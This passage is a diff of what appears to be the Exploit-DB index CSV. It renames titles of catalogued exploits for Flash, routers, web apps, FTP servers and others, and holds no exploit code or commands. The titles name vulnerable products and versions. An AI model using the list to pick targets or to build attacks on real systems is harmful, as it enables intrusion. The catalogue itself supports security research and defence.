36956,platforms/windows/remote/36956.rb,"Adobe Flash Player - domainMemory ByteArray Use-After-Free (Metasploit)",2015-05-08,Metasploit,windows,remote,0 36957,platforms/php/remote/36957.rb,"WordPress Plugin RevSlider 3.0.95 - Arbitrary File Upload / Execution (Metasploit)",2015-05-08,Metasploit,php,remote,80 @@ -15329,7 +15330,7 @@ id,file,description,date,author,platform,type,port 37262,platforms/linux/remote/37262.rb,"ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit)",2015-06-10,Metasploit,linux,remote,0 37336,platforms/multiple/remote/37336.txt,"CUPS < 2.0.3 - Multiple Vulnerabilities",2015-06-22,"Google Security Research",multiple,remote,0 37368,platforms/multiple/remote/37368.rb,"Adobe Flash Player - ShaderJob Buffer Overflow (Metasploit)",2015-06-24,Metasploit,multiple,remote,0 -37396,platforms/windows/remote/37396.txt,"XAMPP for Windows 1.7.7 - Multiple Cross-Site Scripting / SQL Injection",2012-06-13,Sangteamtham,windows,remote,0 +37396,platforms/windows/remote/37396.txt,"XAMPP for Windows 1.7.7 - Multiple Cross-Site Scripting / SQL Injections",2012-06-13,Sangteamtham,windows,remote,0 37400,platforms/windows/remote/37400.php,"Havij - OLE Automation Array Remote Code Execution",2015-06-27,"Mohammad Reza Espargham",windows,remote,0 37429,platforms/hardware/remote/37429.txt,"Juniper Networks Mobility System Software - 'aaa/wba_login.html' Cross-Site Scripting",2012-06-14,"Craig Lambert",hardware,remote,0 37405,platforms/hardware/remote/37405.py,"Edimax IC-3030iWn - UDP Packet Password Information Disclosure",2012-06-14,y3dips,hardware,remote,0 @@ -15339,7 +15340,7 @@ id,file,description,date,author,platform,type,port 37448,platforms/multiple/remote/37448.rb,"Adobe Flash Player - Drawing Fill Shader Memory Corruption (Metasploit)",2015-06-30,Metasploit,multiple,remote,0 37510,platforms/windows/remote/37510.c,"Google Chrome 19.0.1084.52 - 'metro_driver.dll' DLL Loading Arbitrary Code Execution",2012-06-26,"Moshe Zioni",windows,remote,0 37512,platforms/hardware/remote/37512.txt,"Barracuda SSL VPN - launchAgent.do return-To Parameter Cross-Site Scripting",2012-07-18,"Benjamin Kunz Mejri",hardware,remote,0 -37513,platforms/hardware/remote/37513.txt,"Barracuda SSL VPN - fileSystem.do Multiple Parameter Cross-Site Scripting",2012-07-18,"Benjamin Kunz Mejri",hardware,remote,0 +37513,platforms/hardware/remote/37513.txt,"Barracuda SSL VPN - 'fileSystem.do' Multiple Cross-Site Scripting Vulnerabilities",2012-07-18,"Benjamin Kunz Mejri",hardware,remote,0 37523,platforms/multiple/remote/37523.rb,"Adobe Flash Player - ByteArray Use-After-Free (Metasploit)",2015-07-08,Metasploit,multiple,remote,0 37536,platforms/multiple/remote/37536.rb,"Adobe Flash Player - Nellymoser Audio Decoding Buffer Overflow (Metasploit)",2015-07-08,Metasploit,multiple,remote,0 37542,platforms/windows/remote/37542.html,"Barcodewiz 'Barcodewiz.dll' ActiveX Control - 'Barcode' Method Remote Buffer Overflow",2012-07-25,coolkaveh,windows,remote,0 @@ -15359,12 +15360,12 @@ id,file,description,date,author,platform,type,port 37729,platforms/windows/remote/37729.py,"FileZilla Client 2.2.x - Buffer Overflow (SEH)",2015-08-07,ly0n,windows,remote,0 37731,platforms/windows/remote/37731.py,"PCMan FTP Server 2.0.7 - 'PUT' Command Buffer Overflow",2015-08-07,"Jay Turla",windows,remote,21 37746,platforms/windows/remote/37746.py,"Netsparker 2.3.x - Remote Code Execution",2015-08-09,"Hesam Bazvand",windows,remote,0 -37947,platforms/multiple/remote/37947.txt,"Litespeed Web Server - 'gtitle' Parameter Cross-Site Scripting",2012-03-12,K1P0D,multiple,remote,0 +37947,platforms/multiple/remote/37947.txt,"Litespeed Web Server - 'gtitle' Cross-Site Scripting",2012-03-12,K1P0D,multiple,remote,0 37949,platforms/linux/remote/37949.txt,"ModSecurity - 'POST' Security Bypass",2012-10-17,"Bernhard Mueller",linux,remote,0 37951,platforms/windows/remote/37951.py,"Easy File Sharing Web Server 6.9 - USERID Remote Buffer Overflow",2015-08-24,"Tracy Turben",windows,remote,0 37788,platforms/linux/remote/37788.py,"libguac - Remote Buffer Overflow",2012-09-11,"Michael Jumper",linux,remote,0 37792,platforms/android/remote/37792.txt,"Google Chrome for Android - com.android.browser.application_id Intent Extra Data Cross-Site Scripting",2012-09-12,"Artem Chaykin",android,remote,0 -37793,platforms/android/remote/37793.txt,"Google Chrome for Android - Multiple file:: URL Handler Local Downloaded Content Disclosure",2012-09-12,"Artem Chaykin",android,remote,0 +37793,platforms/android/remote/37793.txt,"Google Chrome for Android - Multiple file:: URL Handler Local Downloaded Content Disclosure Vulnerabilities",2012-09-12,"Artem Chaykin",android,remote,0 37794,platforms/android/remote/37794.txt,"Google Chrome for Android - Local Application Handling Cookie Theft",2012-09-12,"Artem Chaykin",android,remote,0 37795,platforms/android/remote/37795.txt,"Google Chrome for Android - Same-origin Policy Bypass Local Symlink",2012-09-12,"Artem Chaykin",android,remote,0 37800,platforms/windows/remote/37800.php,"Microsoft Windows HTA (HTML Application) - Remote Code Execution (MS14-064)",2015-08-17,"Mohammad Reza Espargham",windows,remote,0 @@ -15381,16 +15382,16 @@ id,file,description,date,author,platform,type,port 37900,platforms/multiple/remote/37900.txt,"IBM Lotus Notes Traveler 8.5.1.x - Multiple Input Validation Vulnerabilities",2012-09-28,MustLive,multiple,remote,0 37952,platforms/windows/remote/37952.py,"Easy Address Book Web Server 1.6 - USERID Remote Buffer Overflow",2015-08-24,"Tracy Turben",windows,remote,0 37958,platforms/multiple/remote/37958.rb,"Mozilla Firefox - 'pdf.js' Privileged JavaScript Injection (Metasploit)",2015-08-24,Metasploit,multiple,remote,0 -37969,platforms/hardware/remote/37969.txt,"FirePass 7.0 SSL VPN - 'refreshURL' Parameter URI redirection",2012-10-21,"Aung Khant",hardware,remote,0 +37969,platforms/hardware/remote/37969.txt,"FirePass 7.0 SSL VPN - 'refreshURL' URI Redirection",2012-10-21,"Aung Khant",hardware,remote,0 37985,platforms/windows/remote/37985.py,"FHFS - FTP/HTTP File Server 2.1.2 Remote Command Execution",2015-08-27,"Naser Farhadi",windows,remote,80 -37996,platforms/windows/remote/37996.txt,"Axigen Mail Server - 'Filename' Parameter Directory Traversal",2012-10-31,"Zhao Liang",windows,remote,0 +37996,platforms/windows/remote/37996.txt,"Axigen Mail Server - 'Filename' Directory Traversal",2012-10-31,"Zhao Liang",windows,remote,0 38003,platforms/windows/remote/38003.py,"PCMan FTP Server 2.0.7 - 'GET' Command Buffer Overflow",2015-08-29,Koby,windows,remote,21 38005,platforms/windows/remote/38005.asp,"MS SQL Server 2000/2005 - SQLNS.SQLNamespace COM Object Refresh() Unhandled Pointer Exploit",2015-08-29,ylbhz,windows,remote,0 38013,platforms/windows/remote/38013.py,"PCMan FTP Server 2.0.7 - 'RENAME' Command Buffer Overflow",2015-08-29,Koby,windows,remote,21 -38020,platforms/hardware/remote/38020.py,"Multiple Huawei Products - Password Encryption",2012-11-13,"Roberto Paleari",hardware,remote,0 +38020,platforms/hardware/remote/38020.py,"Huawei (Multiple Products) - Password Encryption",2012-11-13,"Roberto Paleari",hardware,remote,0 38049,platforms/multiple/remote/38049.txt,"Greenstone - Multiple Vulnerabilities",2012-11-23,AkaStep,multiple,remote,0 38058,platforms/ios/remote/38058.py,"Twitter for iPhone - Man in the Middle Security",2012-11-23,"Carlos Reventlov",ios,remote,0 -38100,platforms/hardware/remote/38100.txt,"Multiple Fortinet FortiWeb Appliances - Multiple Cross-Site Scripting Vulnerabilities",2012-12-01,"Benjamin Kunz Mejri",hardware,remote,0 +38100,platforms/hardware/remote/38100.txt,"Fortinet FortiWeb (Multiple Appliances) - Multiple Cross-Site Scripting Vulnerabilities",2012-12-01,"Benjamin Kunz Mejri",hardware,remote,0 38096,platforms/linux/remote/38096.rb,"Endian Firewall - Password Change Command Injection (Metasploit)",2015-09-07,Metasploit,linux,remote,10443 38109,platforms/linux/remote/38109.pl,"Oracle MySQL / MariaDB - Insecure Salt Generation Security Bypass",2012-12-06,kingcope,linux,remote,0 38124,platforms/android/remote/38124.py,"Google Android - 'Stagefright' Remote Code Execution",2015-09-09,"Joshua J. Drake",android,remote,0 @@ -15427,16 +15428,16 @@ id,file,description,date,author,platform,type,port 38356,platforms/hardware/remote/38356.txt,"Foscam < 11.37.2.49 - Directory Traversal",2013-03-01,"Frederic Basse",hardware,remote,0 38402,platforms/multiple/remote/38402.rb,"Zemra Botnet (CnC Web Panel) - Remote Code Execution (Metasploit)",2015-10-05,Metasploit,multiple,remote,0 38401,platforms/windows/remote/38401.rb,"Kaseya Virtual System Administrator (VSA) - 'uploader.aspx' Arbitrary File Upload (Metasploit)",2015-10-05,Metasploit,windows,remote,0 -38368,platforms/multiple/remote/38368.txt,"McAfee Vulnerability Manager - 'cert_cn' Parameter Cross-Site Scripting",2013-03-08,"Asheesh Anaconda",multiple,remote,0 +38368,platforms/multiple/remote/38368.txt,"McAfee Vulnerability Manager - 'cert_cn' Cross-Site Scripting",2013-03-08,"Asheesh Anaconda",multiple,remote,0 38370,platforms/hardware/remote/38370.txt,"PIXORD Vehicle 3G Wi-Fi Router 3GR-431P - Multiple Vulnerabilities",2015-10-01,"Karn Ganeshen",hardware,remote,0 38384,platforms/windows/remote/38384.txt,"Avast! AntiVirus - X.509 Error Rendering Command Execution",2015-10-02,"Google Security Research",windows,remote,0 38387,platforms/multiple/remote/38387.txt,"RubyGems fastreader - 'entry_controller.rb' Remote Command Execution",2013-03-12,"Larry W. Cashdollar",multiple,remote,0 38388,platforms/windows/remote/38388.txt,"QlikView - '.qvw' File Remote Integer Overflow",2013-03-13,"A. Antukh",windows,remote,0 38389,platforms/hardware/remote/38389.txt,"Cisco Video Surveillance Operations Manager - Multiple Vulnerabilities",2013-03-13,b.saleh,hardware,remote,0 38394,platforms/windows/remote/38394.py,"BlazeVideo HDTV Player Standard - '.plf' File Remote Buffer Overflow",2013-03-19,metacom,windows,remote,0 -38536,platforms/hardware/remote/38536.txt,"Barracuda SSL VPN 680 - 'returnTo' Parameter Open redirection",2013-05-27,"Chokri Ben Achor",hardware,remote,0 +38536,platforms/hardware/remote/38536.txt,"Barracuda SSL VPN 680 - 'returnTo' Open Redirection",2013-05-27,"Chokri Ben Achor",hardware,remote,0 38412,platforms/multiple/remote/38412.txt,"IBM Lotus Domino 8.5.x - 'x.nsf' Multiple Cross-Site Scripting Vulnerabilities",2013-03-26,MustLive,multiple,remote,0 -38437,platforms/hardware/remote/38437.txt,"Multiple Foscam IP Cameras - Multiple Cross-Site Request Forgery Vulnerabilities",2013-04-09,shekyan,hardware,remote,0 +38437,platforms/hardware/remote/38437.txt,"Foscam IP (Multiple Cameras) - Multiple Cross-Site Request Forgery Vulnerabilities",2013-04-09,shekyan,hardware,remote,0 38454,platforms/multiple/remote/38454.py,"Linux/MIPS Kernel 2.6.36 - 'NetUSB' Remote Code Execution",2015-10-14,blasty,multiple,remote,0 38453,platforms/hardware/remote/38453.txt,"ZHONE < S3.0.501 - Multiple Vulnerabilities",2015-10-13,"Lyon Yang",hardware,remote,0 38464,platforms/hardware/remote/38464.txt,"Cisco Linksys EA2700 Router - Multiple Vulnerabilities",2013-04-15,"Phil Purviance",hardware,remote,0 @@ -15445,7 +15446,7 @@ id,file,description,date,author,platform,type,port 38492,platforms/hardware/remote/38492.html,"TP-Link TL-WR1043N Router - Cross-Site Request Forgery",2013-04-24,"Jacob Holcomb",hardware,remote,0 38495,platforms/hardware/remote/38495.html,"Belkin F5D8236-4 Router - Cross-Site Request Forgery",2013-04-25,"Jacob Holcomb",hardware,remote,0 38500,platforms/windows/remote/38500.php,"HTML Compiler - Remote Code Execution",2015-10-20,"Ehsan Noreddini",windows,remote,0 -38501,platforms/hardware/remote/38501.txt,"Cisco Linksys E4200 - '/apply.cgi' Multiple Parameter Cross-Site Scripting",2013-04-27,"Carl Benedict",hardware,remote,0 +38501,platforms/hardware/remote/38501.txt,"Cisco Linksys E4200 - '/apply.cgi' Multiple Cross-Site Scripting Vulnerabilities",2013-04-27,"Carl Benedict",hardware,remote,0 38505,platforms/php/remote/38505.rb,"Zpanel - Remote Unauthenticated Remote Code Execution (Metasploit)",2015-10-21,Metasploit,php,remote,0 38512,platforms/windows/remote/38512.php,"The World Browser 3.0 Final - Remote Code Execution",2015-10-22,"Ehsan Noreddini",windows,remote,0 38513,platforms/windows/remote/38513.txt,"TeamSpeak Client 3.0.18.1 - Remote File Inclusion to Remote Code Execution",2015-10-22,Scurippio,windows,remote,0 @@ -15460,12 +15461,12 @@ id,file,description,date,author,platform,type,port 38582,platforms/hardware/remote/38582.html,"Brickcom Multiple IP Cameras - Cross-Site Request Forgery",2013-06-12,Castillo,hardware,remote,0 38583,platforms/hardware/remote/38583.html,"Sony CH / DH Series IP Cameras - Multiple Cross-Site Request Forgery Vulnerabilities",2013-06-12,Castillo,hardware,remote,0 38584,platforms/hardware/remote/38584.txt,"Grandstream Multiple IP Cameras - Cross-Site Request Forgery",2013-06-12,Castillo,hardware,remote,0 -38586,platforms/android/remote/38586.txt,"TaxiMonger for Android - 'name' Parameter HTML Injection",2013-06-15,"Ismail Kaleem",android,remote,0 +38586,platforms/android/remote/38586.txt,"TaxiMonger for Android - 'name' HTML Injection",2013-06-15,"Ismail Kaleem",android,remote,0 38587,platforms/multiple/remote/38587.txt,"Monkey HTTP Daemon Mandril Security Plugin - Security Bypass",2013-06-14,felipensp,multiple,remote,0 38591,platforms/hardware/remote/38591.py,"TP-Link TL-PS110U Print Server - 'tplink-enum.py' Security Bypass",2013-06-19,SANTHO,hardware,remote,0 38597,platforms/multiple/remote/38597.txt,"Motion - Multiple Vulnerabilities",2013-06-26,xistence,multiple,remote,0 38599,platforms/win_x86/remote/38599.py,"Symantec pcAnywhere 12.5.0 (Windows x86) - Remote Code Execution",2015-11-02,"Tomislav Paskalev",win_x86,remote,0 -38632,platforms/hardware/remote/38632.txt,"Multiple Zoom Telephonics Devices - Multiple Vulnerabilities",2013-07-09,"Kyle Lovett",hardware,remote,0 +38632,platforms/hardware/remote/38632.txt,"Zoom Telephonics (Multiple Devices) - Multiple Vulnerabilities",2013-07-09,"Kyle Lovett",hardware,remote,0 38627,platforms/android/remote/38627.sh,"Google Android - 'APK' code Remote Security Bypass",2013-07-03,"Bluebox Security",android,remote,0 38633,platforms/multiple/remote/38633.pl,"Intelligent Platform Management Interface - Information Disclosure",2013-07-02,"Dan Farmer",multiple,remote,0 38634,platforms/ios/remote/38634.txt,"Air Drive Plus - Multiple Input Validation Vulnerabilities",2013-07-09,"Benjamin Kunz Mejri",ios,remote,0 @@ -15503,7 +15504,7 @@ id,file,description,date,author,platform,type,port 38766,platforms/multiple/remote/38766.java,"Mozilla Firefox 9.0.1 - Same Origin Policy Security Bypass",2013-09-17,"Takeshi Terada",multiple,remote,0 38797,platforms/php/remote/38797.rb,"Joomla! 3.4.4 Component Content History - SQL Injection / Remote Code Execution (Metasploit)",2015-11-23,Metasploit,php,remote,80 38802,platforms/multiple/remote/38802.txt,"Oracle GlassFish Server 2.1.1/3.0.1 - Multiple Subcomponent Resource Identifier Traversal Arbitrary File Access",2013-10-15,"Alex Kouzemtchenko",multiple,remote,0 -38804,platforms/hardware/remote/38804.py,"Multiple Level One Enterprise Access Point Devices - 'backupCfg.cgi' Security Bypass",2013-10-15,"Richard Weinberger",hardware,remote,0 +38804,platforms/hardware/remote/38804.py,"Level One Enterprise Access Point (Multiple Devices) - 'backupCfg.cgi' Security Bypass",2013-10-15,"Richard Weinberger",hardware,remote,0 38805,platforms/multiple/remote/38805.txt,"SAP Sybase Adaptive Server Enterprise - XML External Entity Information Disclosure",2015-11-25,"Igor Bulatenko",multiple,remote,0 38809,platforms/php/remote/38809.php,"PHP Point Of Sale - 'ofc_upload_image.php' Remote Code Execution",2013-10-18,Gabby,php,remote,0 38810,platforms/hardware/remote/38810.py,"D-Link / PLANEX COMMUNICATIONS - 'RuntimeDiagnosticPing()' Stack Buffer Overflow",2013-10-14,"Craig Heffner",hardware,remote,0 @@ -15513,7 +15514,7 @@ id,file,description,date,author,platform,type,port 38821,platforms/android/remote/38821.py,"Google Android - Signature Verification Security Bypass",2013-11-04,"Jay Freeman",android,remote,0 38825,platforms/multiple/remote/38825.xml,"IBM Cognos Business Intelligence - XML External Entity Information Disclosure",2013-10-11,IBM,multiple,remote,0 38826,platforms/linux/remote/38826.py,"Linux Kernel 3.0.5 - 'ath9k_htc_set_bssid_mask()' Information Disclosure",2013-12-10,"Mathy Vanhoef",linux,remote,0 -38827,platforms/php/remote/38827.txt,"Nagios XI - 'tfPassword' Parameter SQL Injection",2013-12-13,"Denis Andzakovic",php,remote,0 +38827,platforms/php/remote/38827.txt,"Nagios XI - 'tfPassword' SQL Injection",2013-12-13,"Denis Andzakovic",php,remote,0 38829,platforms/windows/remote/38829.py,"Easy File Sharing Web Server 7.2 - Remote Buffer Overflow (SEH) (DEP Bypass with ROP)",2015-11-30,Knaps,windows,remote,0 36025,platforms/windows/remote/36025.py,"Achat 0.150 beta7 - Buffer Overflow",2015-02-08,"KAhara MAnhara",windows,remote,0 38845,platforms/multiple/remote/38845.txt,"SKIDATA Freemotion.Gate - Unauthenticated Web Services Multiple Command Execution Vulnerabilities",2013-11-19,"Dennis Kelly",multiple,remote,0 @@ -15541,10 +15542,10 @@ id,file,description,date,author,platform,type,port 39008,platforms/windows/remote/39008.py,"Easy File Sharing Web Server 7.2 - GET Buffer Overflow (SEH)",2015-12-16,ArminCyber,windows,remote,80 39009,platforms/windows/remote/39009.py,"Easy File Sharing Web Server 7.2 - HEAD Request Buffer Overflow (SEH)",2015-12-16,ArminCyber,windows,remote,80 39018,platforms/multiple/remote/39018.txt,"Oracle Supply Chain Products Suite - Remote Security",2014-01-14,Oracle,multiple,remote,0 -39074,platforms/cgi/remote/39074.txt,"Seowon Intech WiMAX SWC-9100 Router - '/cgi-bin/diagnostic.cgi ping_ipaddr' Parameter Remote Code Execution",2014-02-03,"Josue Rojas",cgi,remote,0 +39074,platforms/cgi/remote/39074.txt,"Seowon Intech WiMAX SWC-9100 Router - '/cgi-bin/diagnostic.cgi?ping_ipaddr' Remote Code Execution",2014-02-03,"Josue Rojas",cgi,remote,0 39105,platforms/windows/remote/39105.py,"VideoCharge Studio - 'CHTTPResponse::GetHttpResponse()' Stack Buffer Overflow",2014-02-19,"Julien Ahrens",windows,remote,0 39104,platforms/multiple/remote/39104.py,"Dassault Systemes Catia - Stack Buffer Overflow",2014-02-19,"Mohamed Shetta",multiple,remote,0 -39089,platforms/hardware/remote/39089.txt,"NETGEAR D6300B - '/diag.cgi IPAddr4' Parameter Remote Command Execution",2014-02-05,"Marcel Mangold",hardware,remote,0 +39089,platforms/hardware/remote/39089.txt,"NETGEAR D6300B - '/diag.cgi?IPAddr4' Remote Command Execution",2014-02-05,"Marcel Mangold",hardware,remote,0 39114,platforms/ios/remote/39114.txt,"Apple iOS 4.2.1 - 'facetime-audio://' Security Bypass",2014-03-10,"Guillaume Ross",ios,remote,0 39115,platforms/multiple/remote/39115.py,"ET - Chat Password Reset Security Bypass",2014-03-09,IRH,multiple,remote,0 39119,platforms/windows/remote/39119.py,"KiTTY Portable 0.65.0.2p (Windows XP/7/10) - Chat Remote Buffer Overflow (SEH)",2015-12-29,"Guillaume Kaddouch",windows,remote,0 @@ -15564,8 +15565,8 @@ id,file,description,date,author,platform,type,port 39218,platforms/windows/remote/39218.html,"Trend Micro - node.js HTTP Server Listening on localhost Can Execute Commands",2016-01-11,"Google Security Research",windows,remote,0 39222,platforms/multiple/remote/39222.txt,"Foreman Smart-Proxy - Remote Command Injection",2014-06-05,"Lukas Zapletal",multiple,remote,0 39224,platforms/hardware/remote/39224.py,"Fortigate OS 4.x < 5.0.7 - SSH Backdoor",2016-01-12,operator8203,hardware,remote,22 -39258,platforms/multiple/remote/39258.txt,"Alfresco - '/proxy endpoint' Parameter Server-Side Request Forgery",2014-07-16,"V. Paulikas",multiple,remote,0 -39259,platforms/multiple/remote/39259.txt,"Alfresco - '/cmisbrowser url' Parameter Server-Side Request Forgery",2014-07-16,"V. Paulikas",multiple,remote,0 +39258,platforms/multiple/remote/39258.txt,"Alfresco - '/proxy?endpoint' Server-Side Request Forgery",2014-07-16,"V. Paulikas",multiple,remote,0 +39259,platforms/multiple/remote/39259.txt,"Alfresco - '/cmisbrowser?url' Server-Side Request Forgery",2014-07-16,"V. Paulikas",multiple,remote,0 39455,platforms/multiple/remote/39455.txt,"Inductive Automation Ignition 7.8.1 - Remote Leakage Of Shared Buffers",2016-02-17,LiquidWorm,multiple,remote,0 39278,platforms/hardware/remote/39278.txt,"Barracuda Web Application Firewall - Authentication Bypass",2014-08-04,"Nick Hayes",hardware,remote,0 39292,platforms/multiple/remote/39292.pl,"Granding MA300 - Traffic Sniffing MitM Fingerprint PIN Disclosure",2014-08-26,"Eric Sesterhenn",multiple,remote,0 @@ -16592,7 +16593,7 @@ id,file,description,date,author,platform,type,port 574,platforms/php/webapps/574.txt,"ocPortal 1.0.3 - Remote File Inclusion",2004-10-13,Exoduks,php,webapps,0 630,platforms/php/webapps/630.pl,"UBBCentral UBB.Threads 6.2.x < 6.3x - One Char Brute Force Exploit",2004-11-15,RusH,php,webapps,0 631,platforms/php/webapps/631.txt,"vBulletin - 'LAST.php' SQL Injection",2004-11-15,anonymous,php,webapps,0 -635,platforms/php/webapps/635.txt,"MiniBB 1.7f - 'user' Parameter SQL Injection",2004-11-16,anonymous,php,webapps,0 +635,platforms/php/webapps/635.txt,"MiniBB 1.7f - 'user' SQL Injection",2004-11-16,anonymous,php,webapps,0 642,platforms/cgi/webapps/642.pl,"TWiki 20030201 - search.pm Remote Command Execution",2004-11-20,RoMaNSoFt,cgi,webapps,0 645,platforms/php/webapps/645.pl,"GFHost PHP GMail - Remote Command Execution",2004-11-21,spabam,php,webapps,0 647,platforms/php/webapps/647.pl,"phpBB 2.0.10 - Remote Command Execution",2004-11-22,RusH,php,webapps,0 @@ -16623,8 +16624,8 @@ id,file,description,date,author,platform,type,port 818,platforms/php/webapps/818.txt,"vBulletin 3.0.4 - 'forumdisplay.php' Code Execution (1)",2005-02-14,AL3NDALEEB,php,webapps,0 820,platforms/php/webapps/820.php,"vBulletin 3.0.4 - 'forumdisplay.php' Code Execution (2)",2005-02-15,AL3NDALEEB,php,webapps,0 832,platforms/php/webapps/832.txt,"vBulletin 3.0.6 - PHP Code Injection",2005-02-22,pokley,php,webapps,0 -840,platforms/cgi/webapps/840.c,"AWStats 5.7 < 6.2 - Multiple Remote Exploit",2005-02-24,Silentium,cgi,webapps,0 -853,platforms/cgi/webapps/853.c,"AWStats 5.7 < 6.2 - Multiple Remote Exploit (extra)",2005-03-02,omin0us,cgi,webapps,0 +840,platforms/cgi/webapps/840.c,"AWStats 5.7 < 6.2 - Multiple Remote Exploits (PoC)",2005-02-24,Silentium,cgi,webapps,0 +853,platforms/cgi/webapps/853.c,"AWStats 5.7 < 6.2 - Multiple Remote Exploits",2005-03-02,omin0us,cgi,webapps,0 857,platforms/php/webapps/857.txt,"PHP Form Mail 2.3 - Arbitrary File Inclusion",2005-03-05,"Filip Groszynski",php,webapps,0 858,platforms/php/webapps/858.txt,"phpBB 2.0.12 - Session Handling Authentication Bypass (tutorial)",2005-03-05,PPC,php,webapps,0 860,platforms/php/webapps/860.c,"Aztek Forum 4.0 - 'myadmin.php' Database Dumper Exploit",2005-03-07,sirius_black,php,webapps,0 @@ -16648,7 +16649,7 @@ id,file,description,date,author,platform,type,port 30090,platforms/php/webapps/30090.txt,"phpPgAdmin 4.1.1 - 'Redirect.php' Cross-Site Scripting",2007-05-25,"Michal Majchrowicz",php,webapps,0 923,platforms/cgi/webapps/923.pl,"The Includer CGI 1.0 - Remote Command Execution (3)",2005-04-08,K-C0d3r,cgi,webapps,0 925,platforms/asp/webapps/925.txt,"ACNews 1.0 - Authentication Bypass",2005-04-09,LaMeR,asp,webapps,0 -928,platforms/php/webapps/928.py,"PunBB 1.2.4 - 'id' Parameter SQL Injection",2005-04-11,"Stefan Esser",php,webapps,0 +928,platforms/php/webapps/928.py,"PunBB 1.2.4 - 'id' SQL Injection",2005-04-11,"Stefan Esser",php,webapps,0 939,platforms/php/webapps/939.pl,"S9Y Serendipity 0.8beta4 - exit.php SQL Injection",2005-04-13,kre0n,php,webapps,0 954,platforms/cgi/webapps/954.pl,"E-Cart 1.1 - 'index.cgi' Remote Command Execution",2005-04-25,z,cgi,webapps,0 980,platforms/cgi/webapps/980.pl,"I-Mall Commerce - 'i-mall.cgi' Remote Command Execution",2005-05-04,"Jerome Athias",cgi,webapps,0 @@ -16719,7 +16720,7 @@ id,file,description,date,author,platform,type,port 1172,platforms/php/webapps/1172.pl,"MyBulletinBoard (MyBB) 1.00 RC4 - 'search.php' SQL Injection",2005-08-22,Alpha_Programmer,php,webapps,0 1189,platforms/php/webapps/1189.c,"vBulletin 3.0.8 - Accessible Database Backup Searcher (update 3)",2005-08-31,str0ke,php,webapps,0 1191,platforms/php/webapps/1191.pl,"Simple PHP Blog 0.4.0 - Multiple Remote Exploits",2005-09-01,"Kenneth Belva",php,webapps,0 -1194,platforms/cgi/webapps/1194.c,"man2web 0.88 - Multiple Remote Command Execution (update2)",2005-09-04,tracewar,cgi,webapps,0 +1194,platforms/cgi/webapps/1194.c,"man2web 0.88 - Multiple Remote Command Executions (2)",2005-09-04,tracewar,cgi,webapps,0 1200,platforms/php/webapps/1200.php,"PBLang 4.65 - Remote Command Execution (1)",2005-09-07,rgod,php,webapps,0 1202,platforms/php/webapps/1202.php,"PBLang 4.65 - Remote Command Execution (2)",2005-09-07,RusH,php,webapps,0 1207,platforms/php/webapps/1207.php,"Class-1 Forum 0.24.4 - Remote Code Execution",2005-09-09,rgod,php,webapps,0 @@ -16733,7 +16734,7 @@ id,file,description,date,author,platform,type,port 1226,platforms/php/webapps/1226.php,"phpMyFAQ 1.5.1 - (User-Agent) Remote Shell Injection",2005-09-23,rgod,php,webapps,0 1227,platforms/php/webapps/1227.php,"MailGust 1.9 - (board takeover) SQL Injection",2005-09-24,rgod,php,webapps,0 1236,platforms/cgi/webapps/1236.pm,"Barracuda Spam Firewall < 3.1.18 - Command Execution (Metasploit)",2005-09-27,"Nicolas Gregoire",cgi,webapps,0 -1237,platforms/php/webapps/1237.php,"PHP-Fusion 6.00.109 - 'msg_send' Parameter SQL Injection",2005-09-28,rgod,php,webapps,0 +1237,platforms/php/webapps/1237.php,"PHP-Fusion 6.00.109 - 'msg_send' SQL Injection",2005-09-28,rgod,php,webapps,0 1240,platforms/php/webapps/1240.php,"Utopia News Pro 1.1.3 - 'news.php' SQL Injection",2005-10-06,rgod,php,webapps,0 1241,platforms/php/webapps/1241.php,"Cyphor 0.19 - Board Takeover SQL Injection",2005-10-08,rgod,php,webapps,0 1244,platforms/php/webapps/1244.pl,"phpMyAdmin 2.6.4-pl1 - Directory Traversal",2005-10-10,cXIb8O3,php,webapps,0 @@ -16774,7 +16775,7 @@ id,file,description,date,author,platform,type,port 1379,platforms/php/webapps/1379.php,"PHPGedView 3.3.7 - Remote Code Execution",2005-12-20,rgod,php,webapps,0 1382,platforms/php/webapps/1382.pl,"phpBB 2.0.18 - Remote Brute Force/Dictionary (2)",2006-02-20,DarkFig,php,webapps,0 1383,platforms/php/webapps/1383.txt,"phpBB 2.0.18 - Cross-Site Scripting / Cookie Disclosure",2005-12-21,jet,php,webapps,0 -1385,platforms/php/webapps/1385.pl,"PHP-Fusion 6.00.3 - 'rating' Parameter SQL Injection",2005-12-23,krasza,php,webapps,0 +1385,platforms/php/webapps/1385.pl,"PHP-Fusion 6.00.3 - 'rating' SQL Injection",2005-12-23,krasza,php,webapps,0 1387,platforms/php/webapps/1387.php,"Dev Web Management System 1.5 - (cat) SQL Injection",2005-12-24,rgod,php,webapps,0 1388,platforms/php/webapps/1388.pl,"phpBB 2.0.17 - (signature_bbcode_uid) Remote Command Exploit",2005-12-24,RusH,php,webapps,0 1395,platforms/php/webapps/1395.php,"phpDocumentor 1.3.0 rc4 - Remote Commands Execution Exploit",2005-12-29,rgod,php,webapps,0 @@ -16785,7 +16786,7 @@ id,file,description,date,author,platform,type,port 1405,platforms/php/webapps/1405.pl,"FlatCMS 1.01 - 'file_editor.php' Remote Command Execution",2006-01-04,cijfer,php,webapps,0 1410,platforms/php/webapps/1410.pl,"Magic News Plus 1.0.3 - Admin Pass Change Exploit",2006-01-09,cijfer,php,webapps,0 1418,platforms/asp/webapps/1418.txt,"MiniNuke 1.8.2 - Multiple SQL Injections",2006-01-14,nukedx,asp,webapps,0 -1419,platforms/asp/webapps/1419.pl,"MiniNuke 1.8.2 - 'hid' Parameter SQL Injection",2006-01-14,DetMyl,asp,webapps,0 +1419,platforms/asp/webapps/1419.pl,"MiniNuke 1.8.2 - 'hid' SQL Injection",2006-01-14,DetMyl,asp,webapps,0 1442,platforms/php/webapps/1442.pl,"EZDatabase 2.0 - (db_id) Remote Command Execution",2006-01-22,cijfer,php,webapps,0 1446,platforms/php/webapps/1446.pl,"creLoaded 6.15 - (HTMLAREA) Automated Perl Exploit",2006-01-24,kaneda,php,webapps,0 1453,platforms/php/webapps/1453.pl,"Phpclanwebsite 1.23.1 - SQL Injection",2006-01-25,matrix_killer,php,webapps,0 @@ -16811,7 +16812,7 @@ id,file,description,date,author,platform,type,port 1503,platforms/php/webapps/1503.pl,"YapBB 1.2 - 'cfgIncludeDirectory' Remote Command Execution",2006-02-16,cijfer,php,webapps,0 1508,platforms/cgi/webapps/1508.pl,"AWStats < 6.4 - (referer) Remote Command Execution",2006-02-17,RusH,cgi,webapps,0 1509,platforms/php/webapps/1509.pl,"Zorum Forum 3.5 - 